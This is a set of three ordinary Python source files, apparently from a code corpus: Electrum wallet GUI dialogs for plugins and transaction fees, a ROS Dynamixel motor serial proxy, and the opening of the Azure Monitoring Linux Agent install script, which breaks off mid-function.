self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
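        # proposed fee: the configured rate (fee_per_kb() is assumed to be in
        # satoshis per kB) applied to the combined size of parent and child, as
        # described in the dialog text above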
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
        vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
dynamixel_serial_proxy.py
|
# -*- coding: utf-8 -*-
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2010-2011, Antons Rebguns.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of University of Arizona nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = 'Antons Rebguns'
__copyright__ = 'Copyright (c) 2010-2011 Antons Rebguns'
__credits__ = 'Cody Jorgensen, Cara Slutter'
__license__ = 'BSD'
__maintainer__ = 'Cong Liu'
__email__ = 'liucong.cdhaw@gmail.com'
import math
import sys
import errno
from collections import deque
from threading import Thread
from collections import defaultdict
import roslib
roslib.load_manifest('cyton_xqtor_driver')
import rospy
import dynamixel_io
from cyton_xqtor_driver.dynamixel_const import *
from diagnostic_msgs.msg import DiagnosticArray
from diagnostic_msgs.msg import DiagnosticStatus
from diagnostic_msgs.msg import KeyValue
from dynamixel_msgs.msg import MotorState
from dynamixel_msgs.msg import MotorStateList
class SerialProxy():
def __init__(self,
port_name='/dev/ttyUSB0',
port_namespace='ttyUSB0',
baud_rate='1000000',
min_motor_id=1,
max_motor_id=25,
update_rate=5,
diagnostics_rate=1,
error_level_temp=75,
warn_level_temp=70,
readback_echo=False):
self.port_name = port_name
self.port_namespace = port_namespace
self.baud_rate = baud_rate
self.min_motor_id = min_motor_id
self.max_motor_id = max_motor_id
self.update_rate = update_rate
self.diagnostics_rate = diagnostics_rate
self.error_level_temp = error_level_temp
self.warn_level_temp = warn_level_temp
self.readback_echo = readback_echo
self.actual_rate = update_rate
self.error_counts = {'non_fatal': 0, 'checksum': 0, 'dropped': 0}
self.current_state = MotorStateList()
self.num_ping_retries = 5
self.motor_states_pub = rospy.Publisher('motor_states/%s' % self.port_namespace, MotorStateList, queue_size=1)
self.diagnostics_pub = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=1)
def connect(self):
try:
self.dxl_io = dynamixel_io.DynamixelIO(self.port_name, self.baud_rate, self.readback_echo)
self.__find_motors()
except dynamixel_io.SerialOpenError, e:
rospy.logfatal(e.message)
sys.exit(1)
self.running = True
if self.update_rate > 0: Thread(target=self.__update_motor_states).start()
if self.diagnostics_rate > 0: Thread(target=self.__publish_diagnostic_information).start()
def disconnect(self):
self.running = False
def __fill_motor_parameters(self, motor_id, model_number):
"""
Stores some extra information about each motor on the parameter server.
        Some of these parameters are used in the joint controller implementation.
"""
angles = self.dxl_io.get_angle_limits(motor_id)
voltage = self.dxl_io.get_voltage(motor_id)
voltages = self.dxl_io.get_voltage_limits(motor_id)
rospy.set_param('dynamixel/%s/%d/model_number' %(self.port_namespace, motor_id), model_number)
rospy.set_param('dynamixel/%s/%d/model_name' %(self.port_namespace, motor_id), DXL_MODEL_TO_PARAMS[model_number]['name'])
rospy.set_param('dynamixel/%s/%d/min_angle' %(self.port_namespace, motor_id), angles['min'])
rospy.set_param('dynamixel/%s/%d/max_angle' %(self.port_namespace, motor_id), angles['max'])
torque_per_volt = DXL_MODEL_TO_PARAMS[model_number]['torque_per_volt']
rospy.set_param('dynamixel/%s/%d/torque_per_volt' %(self.port_namespace, motor_id), torque_per_volt)
rospy.set_param('dynamixel/%s/%d/max_torque' %(self.port_namespace, motor_id), torque_per_volt * voltage)
velocity_per_volt = DXL_MODEL_TO_PARAMS[model_number]['velocity_per_volt']
rpm_per_tick = DXL_MODEL_TO_PARAMS[model_number]['rpm_per_tick']
rospy.set_param('dynamixel/%s/%d/velocity_per_volt' %(self.port_namespace, motor_id), velocity_per_volt)
rospy.set_param('dynamixel/%s/%d/max_velocity' %(self.port_namespace, motor_id), velocity_per_volt * voltage)
rospy.set_param('dynamixel/%s/%d/radians_second_per_encoder_tick' %(self.port_namespace, motor_id), rpm_per_tick * RPM_TO_RADSEC)
encoder_resolution = DXL_MODEL_TO_PARAMS[model_number]['encoder_resolution']
range_degrees = DXL_MODEL_TO_PARAMS[model_number]['range_degrees']
range_radians = math.radians(range_degrees)
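        # derived conversion factors between encoder ticks and degrees/radians,
        # published so joint controllers can convert positions in either direction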
rospy.set_param('dynamixel/%s/%d/encoder_resolution' %(self.port_namespace, motor_id), encoder_resolution)
rospy.set_param('dynamixel/%s/%d/range_degrees' %(self.port_namespace, motor_id), range_degrees)
rospy.set_param('dynamixel/%s/%d/range_radians' %(self.port_namespace, motor_id), range_radians)
rospy.set_param('dynamixel/%s/%d/encoder_ticks_per_degree' %(self.port_namespace, motor_id), encoder_resolution / range_degrees)
rospy.set_param('dynamixel/%s/%d/encoder_ticks_per_radian' %(self.port_namespace, motor_id), encoder_resolution / range_radians)
rospy.set_param('dynamixel/%s/%d/degrees_per_encoder_tick' %(self.port_namespace, motor_id), range_degrees / encoder_resolution)
rospy.set_param('dynamixel/%s/%d/radians_per_encoder_tick' %(self.port_namespace, motor_id), range_radians / encoder_resolution)
# keep some parameters around for diagnostics
self.motor_static_info[motor_id] = {}
self.motor_static_info[motor_id]['model'] = DXL_MODEL_TO_PARAMS[model_number]['name']
self.motor_static_info[motor_id]['firmware'] = self.dxl_io.get_firmware_version(motor_id)
self.motor_static_info[motor_id]['delay'] = self.dxl_io.get_return_delay_time(motor_id)
self.motor_static_info[motor_id]['min_angle'] = angles['min']
self.motor_static_info[motor_id]['max_angle'] = angles['max']
self.motor_static_info[motor_id]['min_voltage'] = voltages['min']
self.motor_static_info[motor_id]['max_voltage'] = voltages['max']
def __find_motors(self):
rospy.loginfo('%s: Pinging motor IDs %d through %d...' % (self.port_namespace, self.min_motor_id, self.max_motor_id))
self.motors = []
self.motor_static_info = {}
for motor_id in range(self.min_motor_id, self.max_motor_id + 1):
for trial in range(self.num_ping_retries):
try:
result = self.dxl_io.ping(motor_id)
except Exception as ex:
rospy.logerr('Exception thrown while pinging motor %d - %s' % (motor_id, ex))
continue
if result:
self.motors.append(motor_id)
break
if not self.motors:
rospy.logfatal('%s: No motors found.' % self.port_namespace)
sys.exit(1)
counts = defaultdict(int)
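        # read each motor's model number (with retries); motors that keep failing
        # are dropped from the connected list below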
to_delete_if_error = []
for motor_id in self.motors:
for trial in range(self.num_ping_retries):
try:
model_number = self.dxl_io.get_model_number(motor_id)
self.__fill_motor_parameters(motor_id, model_number)
except Exception as ex:
rospy.logerr('Exception thrown while getting attributes for motor %d - %s' % (motor_id, ex))
if trial == self.num_ping_retries - 1: to_delete_if_error.append(motor_id)
continue
counts[model_number] += 1
break
for motor_id in to_delete_if_error:
self.motors.remove(motor_id)
rospy.set_param('dynamixel/%s/connected_ids' % self.port_namespace, self.motors)
status_str = '%s: Found %d motors - ' % (self.port_namespace, len(self.motors))
for model_number,count in counts.items():
if count:
model_name = DXL_MODEL_TO_PARAMS[model_number]['name']
status_str += '%d %s [' % (count, model_name)
for motor_id in self.motors:
if self.motor_static_info[motor_id]['model'] == model_name:
status_str += '%d, ' % motor_id
status_str = status_str[:-2] + '], '
rospy.loginfo('%s, initialization complete.' % status_str[:-2])
def __update_motor_states(self):
num_events = 50
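        # moving average over the last 50 loop iterations, reported as the actual update rate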
rates = deque([float(self.update_rate)]*num_events, maxlen=num_events)
last_time = rospy.Time.now()
rate = rospy.Rate(self.update_rate)
while not rospy.is_shutdown() and self.running:
# get current state of all motors and publish to motor_states topic
motor_states = []
for motor_id in self.motors:
try:
state = self.dxl_io.get_feedback(motor_id)
if state:
motor_states.append(MotorState(**state))
if dynamixel_io.exception: raise dynamixel_io.exception
except dynamixel_io.FatalErrorCodeError as fece:
rospy.logerr(fece)
except dynamixel_io.NonfatalErrorCodeError as nfece:
self.error_counts['non_fatal'] += 1
rospy.logdebug(nfece)
except dynamixel_io.ChecksumError as cse:
self.error_counts['checksum'] += 1
rospy.logdebug(cse)
except dynamixel_io.DroppedPacketError as dpe:
self.error_counts['dropped'] += 1
rospy.logdebug(dpe)
except OSError as ose:
if ose.errno != errno.EAGAIN:
rospy.logfatal(errno.errorcode[ose.errno])
rospy.signal_shutdown(errno.errorcode[ose.errno])
if motor_states:
msl = MotorStateList()
msl.motor_states = motor_states
self.motor_states_pub.publish(msl)
self.current_state = msl
# calculate actual update rate
current_time = rospy.Time.now()
rates.append(1.0 / (current_time - last_time).to_sec())
self.actual_rate = round(sum(rates)/num_events, 2)
last_time = current_time
rate.sleep()
def __publish_diagnostic_information(self):
diag_msg = DiagnosticArray()
rate = rospy.Rate(self.diagnostics_rate)
while not rospy.is_shutdown() and self.running:
diag_msg.status = []
diag_msg.header.stamp = rospy.Time.now()
status = DiagnosticStatus()
status.name = 'Dynamixel Serial Bus (%s)' % self.port_namespace
status.hardware_id = 'Dynamixel Serial Bus on port %s' % self.port_name
status.values.append(KeyValue('Baud Rate', str(self.baud_rate)))
status.values.append(KeyValue('Min Motor ID', str(self.min_motor_id)))
status.values.append(KeyValue('Max Motor ID', str(self.max_motor_id)))
status.values.append(KeyValue('Desired Update Rate', str(self.update_rate)))
status.values.append(KeyValue('Actual Update Rate', str(self.actual_rate)))
status.values.append(KeyValue('# Non Fatal Errors', str(self.error_counts['non_fatal'])))
status.values.append(KeyValue('# Checksum Errors', str(self.error_counts['checksum'])))
status.values.append(KeyValue('# Dropped Packet Errors', str(self.error_counts['dropped'])))
status.level = DiagnosticStatus.OK
status.message = 'OK'
if self.actual_rate - self.update_rate < -5:
status.level = DiagnosticStatus.WARN
status.message = 'Actual update rate is lower than desired'
diag_msg.status.append(status)
for motor_state in self.current_state.motor_states:
mid = motor_state.id
status = DiagnosticStatus()
status.name = 'Robotis Dynamixel Motor %d on port %s' % (mid, self.port_namespace)
status.hardware_id = 'DXL-%d@%s' % (motor_state.id, self.port_namespace)
status.values.append(KeyValue('Model Name', str(self.motor_static_info[mid]['model'])))
status.values.append(KeyValue('Firmware Version', str(self.motor_static_info[mid]['firmware'])))
status.values.append(KeyValue('Return Delay Time', str(self.motor_static_info[mid]['delay'])))
status.values.append(KeyValue('Minimum Voltage', str(self.motor_static_info[mid]['min_voltage'])))
status.values.append(KeyValue('Maximum Voltage', str(self.motor_static_info[mid]['max_voltage'])))
status.values.append(KeyValue('Minimum Position (CW)', str(self.motor_static_info[mid]['min_angle'])))
status.values.append(KeyValue('Maximum Position (CCW)', str(self.motor_static_info[mid]['max_angle'])))
status.values.append(KeyValue('Goal', str(motor_state.goal)))
status.values.append(KeyValue('Position', str(motor_state.position)))
status.values.append(KeyValue('Error', str(motor_state.error)))
status.values.append(KeyValue('Velocity', str(motor_state.speed)))
status.values.append(KeyValue('Load', str(motor_state.load)))
status.values.append(KeyValue('Voltage', str(motor_state.voltage)))
status.values.append(KeyValue('Temperature', str(motor_state.temperature)))
status.values.append(KeyValue('Moving', str(motor_state.moving)))
if motor_state.temperature >= self.error_level_temp:
status.level = DiagnosticStatus.ERROR
status.message = 'OVERHEATING'
elif motor_state.temperature >= self.warn_level_temp:
status.level = DiagnosticStatus.WARN
status.message = 'VERY HOT'
else:
status.level = DiagnosticStatus.OK
status.message = 'OK'
diag_msg.status.append(status)
self.diagnostics_pub.publish(diag_msg)
rate.sleep()
if __name__ == '__main__':
try:
serial_proxy = SerialProxy()
serial_proxy.connect()
rospy.spin()
serial_proxy.disconnect()
except rospy.ROSInterruptException: pass
|
agent.py
|
#!/usr/bin/env python
#
# AzureMonitoringLinuxAgent Extension
#
# Copyright 2019 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, so let's skip the import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import datetime
import signal
import pwd
import grp
import re
import filecmp
import stat
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import shutil
import crypt
import xml.dom.minidom
import re
import hashlib
from distutils.version import LooseVersion
from hashlib import sha256
from shutil import copyfile
from threading import Thread
import telegraf_utils.telegraf_config_handler as telhandler
import metrics_ext_utils.metrics_constants as metrics_constants
import metrics_ext_utils.metrics_ext_handler as me_handler
import metrics_ext_utils.metrics_common_utils as metrics_utils
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
# This code is taken from the omsagent's extension wrapper.
# This same monkey patch fix is relevant for AMA extension as well.
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
def check_output(*popenargs, **kwargs):
r"""Backport from subprocess module from python 2.7"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
# Exception classes used by this module.
class CalledProcessError(Exception):
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
subprocess.check_output = check_output
subprocess.CalledProcessError = CalledProcessError
# Global Variables
PackagesDirectory = 'packages'
# TO BE CHANGED WITH EACH NEW RELEASE IF THE BUNDLE VERSION CHANGES
# TODO: Installer should automatically figure this out from the folder instead of requiring this update
BundleFileNameDeb = 'azure-mdsd_1.5.133-build.master.157_x86_64.deb'
BundleFileNameRpm = 'azure-mdsd_1.5.133-build.master.157_x86_64.rpm'
BundleFileName = ''
TelegrafBinName = 'telegraf'
InitialRetrySleepSeconds = 30
PackageManager = ''
PackageManagerOptions = ''
MdsdCounterJsonPath = '/etc/mdsd.d/config-cache/metricCounters.json'
# Commands
OneAgentInstallCommand = ''
OneAgentUninstallCommand = ''
RestartOneAgentServiceCommand = ''
DisableOneAgentServiceCommand = ''
# Error codes
DPKGLockedErrorCode = 56
MissingorInvalidParameterErrorCode = 53
UnsupportedOperatingSystem = 51
IndeterminateOperatingSystem = 51
# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None
# Change permission of log path - if we fail, that is not an exit case
try:
ext_log_path = '/var/log/azure/'
if os.path.exists(ext_log_path):
os.chmod(ext_log_path, 0o700)
except:
pass
def main():
"""
Main method
Parse out operation from argument, invoke the operation, and finish.
"""
init_waagent_logger()
waagent_log_info('Azure Monitoring Agent for Linux started to handle.')
# Determine the operation being executed
operation = None
try:
option = sys.argv[1]
if re.match('^([-/]*)(disable)', option):
operation = 'Disable'
elif re.match('^([-/]*)(uninstall)', option):
operation = 'Uninstall'
elif re.match('^([-/]*)(install)', option):
operation = 'Install'
elif re.match('^([-/]*)(enable)', option):
operation = 'Enable'
elif re.match('^([-/]*)(update)', option):
operation = 'Update'
elif re.match('^([-/]*)(metrics)', option):
operation = 'Metrics'
elif re.match('^([-/]*)(arc)', option):
operation = 'Arc'
except Exception as e:
waagent_log_error(str(e))
if operation is None:
log_and_exit('Unknown', 1, 'No valid operation provided')
# Set up for exit code and any error messages
exit_code = 0
message = '{0} succeeded'.format(operation)
exit_code = check_disk_space_availability()
if exit_code != 0:
message = '{0} failed due to low disk space'.format(operation)
log_and_exit(operation, exit_code, message)
# Invoke operation
try:
global HUtilObject
HUtilObject = parse_context(operation)
exit_code, output = operations[operation]()
# Exit code 1 indicates a general problem that doesn't have a more
# specific error code; it often indicates a missing dependency
if exit_code == 1 and operation == 'Install':
message = 'Install failed with exit code 1. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.Azure.Monitor' \
'.AzureMonitorLinuxAgent'
elif exit_code == DPKGLockedErrorCode and operation == 'Install':
message = 'Install failed with exit code {0} because the ' \
'package manager on the VM is currently locked: ' \
'please wait and try again'.format(DPKGLockedErrorCode)
elif exit_code != 0:
message = '{0} failed with exit code {1} {2}'.format(operation,
exit_code, output)
except AzureMonitorAgentForLinuxException as e:
exit_code = e.error_code
message = e.get_error_message(operation)
except Exception as e:
exit_code = 1
message = '{0} failed with error: {1}\n' \
'Stacktrace: {2}'.format(operation, e,
traceback.format_exc())
# Finish up and log messages
log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
"""
Check if there is the required space on the machine.
"""
try:
if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 :
# 52 is the exit code for missing dependency i.e. disk space
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
return 52
else:
return 0
except:
print('Failed to check disk usage.')
return 0
def get_free_space_mb(dirname):
"""
Get the free space in MB in the directory path.
"""
st = os.statvfs(dirname)
return (st.f_bavail * st.f_frsize) // (1024 * 1024)
def is_systemd():
"""
Check if the system is using systemd
"""
check_systemd = os.system("pidof systemd 1>/dev/null 2>&1")
return check_systemd == 0
def install():
"""
Ensure that this VM distro and version are supported.
Install the Azure Monitor Linux Agent package, using retries.
Note: install operation times out from WAAgent at 15 minutes, so do not
wait longer.
"""
find_package_manager("Install")
exit_if_vm_not_supported('Install')
public_settings, protected_settings = get_settings()
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
os.chmod(bundle_path, 100)
print(PackageManager, " and ", BundleFileName)
OneAgentInstallCommand = "{0} {1} -i {2}".format(PackageManager, PackageManagerOptions, bundle_path)
hutil_log_info('Running command "{0}"'.format(OneAgentInstallCommand))
# Retry, since install can fail due to concurrent package operations
exit_code, output = run_command_with_retries_output(OneAgentInstallCommand, retries = 15,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
# Set task limits to max of 65K in suse 12
# Based on Task 9764411: AMA broken after 1.7 in sles 12 - https://dev.azure.com/msazure/One/_workitems/edit/9764411
vm_dist, vm_ver = find_vm_distro('Install')
if vm_dist.lower().startswith('suse'):
try:
suse_exit_code, suse_output = run_command_and_log("mkdir -p /etc/systemd/system/mdsd.service.d")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo '[Service]' > /etc/systemd/system/mdsd.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo 'TasksMax=65535' >> /etc/systemd/system/mdsd.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("systemctl daemon-reload")
if suse_exit_code != 0:
return suse_exit_code, suse_output
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to update /etc/systemd/system/mdsd.service.d for suse 12,15" )
default_configs = {
"MDSD_LOG" : "/var/log",
"MDSD_ROLE_PREFIX" : "/var/run/mdsd/default",
"MDSD_SPOOL_DIRECTORY" : "/var/opt/microsoft/linuxmonagent",
"MDSD_OPTIONS" : "\"-A -c /etc/mdsd.d/mdsd.xml -d -r $MDSD_ROLE_PREFIX -S $MDSD_SPOOL_DIRECTORY/eh -e $MDSD_LOG/mdsd.err -w $MDSD_LOG/mdsd.warn -o $MDSD_LOG/mdsd.info\"",
"MCS_ENDPOINT" : "handler.control.monitor.azure.com",
"AZURE_ENDPOINT" : "https://monitor.azure.com/",
"ADD_REGION_TO_MCS_ENDPOINT" : "true",
"ENABLE_MCS" : "false",
"MONITORING_USE_GENEVA_CONFIG_SERVICE" : "false",
"MDSD_USE_LOCAL_PERSISTENCY" : "true",
#"OMS_TLD" : "int2.microsoftatlanta-int.com",
#"customResourceId" : "/subscriptions/42e7aed6-f510-46a2-8597-a5fe2e15478b/resourcegroups/amcs-test/providers/Microsoft.OperationalInsights/workspaces/amcs-pretend-linuxVM",
}
# Decide the mode
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == "true":
hutil_log_info("Detecting Auto-Config mode.")
return 0, ""
elif protected_settings is None or len(protected_settings) == 0:
default_configs["ENABLE_MCS"] = "true"
else:
# look for LA protected settings
for var in list(protected_settings.keys()):
if "_key" in var or "_id" in var:
default_configs[var] = protected_settings.get(var)
# check if required GCS params are available
MONITORING_GCS_CERT_CERTFILE = None
if "certificate" in protected_settings:
MONITORING_GCS_CERT_CERTFILE = base64.standard_b64decode(protected_settings.get("certificate"))
MONITORING_GCS_CERT_KEYFILE = None
if "certificateKey" in protected_settings:
MONITORING_GCS_CERT_KEYFILE = base64.standard_b64decode(protected_settings.get("certificateKey"))
MONITORING_GCS_ENVIRONMENT = ""
if "monitoringGCSEnvironment" in protected_settings:
MONITORING_GCS_ENVIRONMENT = protected_settings.get("monitoringGCSEnvironment")
MONITORING_GCS_NAMESPACE = ""
if "namespace" in protected_settings:
MONITORING_GCS_NAMESPACE = protected_settings.get("namespace")
MONITORING_GCS_ACCOUNT = ""
if "monitoringGCSAccount" in protected_settings:
MONITORING_GCS_ACCOUNT = protected_settings.get("monitoringGCSAccount")
MONITORING_GCS_REGION = ""
if "monitoringGCSRegion" in protected_settings:
MONITORING_GCS_REGION = protected_settings.get("monitoringGCSRegion")
MONITORING_CONFIG_VERSION = ""
if "configVersion" in protected_settings:
MONITORING_CONFIG_VERSION = protected_settings.get("configVersion")
MONITORING_GCS_AUTH_ID_TYPE = ""
if "monitoringGCSAuthIdType" in protected_settings:
MONITORING_GCS_AUTH_ID_TYPE = protected_settings.get("monitoringGCSAuthIdType")
MONITORING_GCS_AUTH_ID = ""
if "monitoringGCSAuthId" in protected_settings:
MONITORING_GCS_AUTH_ID = protected_settings.get("monitoringGCSAuthId")
if ((MONITORING_GCS_CERT_CERTFILE is None or MONITORING_GCS_CERT_KEYFILE is None) and (MONITORING_GCS_AUTH_ID_TYPE == "")) or MONITORING_GCS_ENVIRONMENT == "" or MONITORING_GCS_NAMESPACE == "" or MONITORING_GCS_ACCOUNT == "" or MONITORING_GCS_REGION == "" or MONITORING_CONFIG_VERSION == "":
waagent_log_error('Not all required GCS parameters are provided')
raise ParameterMissingException
else:
# set the values for GCS
default_configs["MONITORING_USE_GENEVA_CONFIG_SERVICE"] = "true"
default_configs["MONITORING_GCS_ENVIRONMENT"] = MONITORING_GCS_ENVIRONMENT
default_configs["MONITORING_GCS_NAMESPACE"] = MONITORING_GCS_NAMESPACE
default_configs["MONITORING_GCS_ACCOUNT"] = MONITORING_GCS_ACCOUNT
default_configs["MONITORING_GCS_REGION"] = MONITORING_GCS_REGION
default_configs["MONITORING_CONFIG_VERSION"] = MONITORING_CONFIG_VERSION
# write the certificate and key to disk
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
if MONITORING_GCS_AUTH_ID_TYPE != "":
default_configs["MONITORING_GCS_AUTH_ID_TYPE"] = MONITORING_GCS_AUTH_ID_TYPE
if MONITORING_GCS_AUTH_ID != "":
default_configs["MONITORING_GCS_AUTH_ID"] = MONITORING_GCS_AUTH_ID
if MONITORING_GCS_CERT_CERTFILE is not None:
